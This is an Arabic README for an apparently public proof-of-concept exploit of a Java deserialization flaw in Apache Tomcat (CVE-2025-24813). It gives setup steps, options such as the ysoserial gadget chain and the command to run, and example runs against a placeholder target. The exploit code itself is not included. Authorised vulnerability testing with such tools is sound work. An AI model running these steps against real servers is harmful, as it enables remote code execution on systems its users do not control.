
استغلال إثبات المفهوم لـ CVE-2025-24813، وهي ثغرة إلغاء تسلسل Java في Apache Tomcat. يقوم بتوليد حمولات متسلسلة خبيثة وتحميلها كملفات جلسة لبدء تنفيذ كود عن بُعد.
يحتوي هذا المستودع على استغلال إثبات المفهوم لـ CVE-2025-24813، وهي ثغرة إلغاء تسلسل Java في Apache Tomcat.
بناءً على absholi7ly/POC-CVE-2025-24813/.
تثبيت التبعيات:
uv venv
source .venv/bin/activate
uv sync
تنزيل ysoserial:
./download.sh
بناء وتشغيل الاستغلال في حاوية:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
تشغيل الاستغلال مباشرة:
python main.py <target_url> [options]
--command: الأمر المنفذ (الافتراضي: calc.exe)--ysoserial: مسار ysoserial.jar (الافتراضي: ./ysoserial-all.jar)--gadget: سلسلة gadget chain لـ ysoserial (الافتراضي: CommonsCollections6)--payload_type: نوع الحمولة - ysoserial أو java (الافتراضي: ysoserial)--no-ssl-verify: تعطيل التحقق من SSL# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
هذه الأداة لأغراض تعليمية واختبارية مرخصة فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.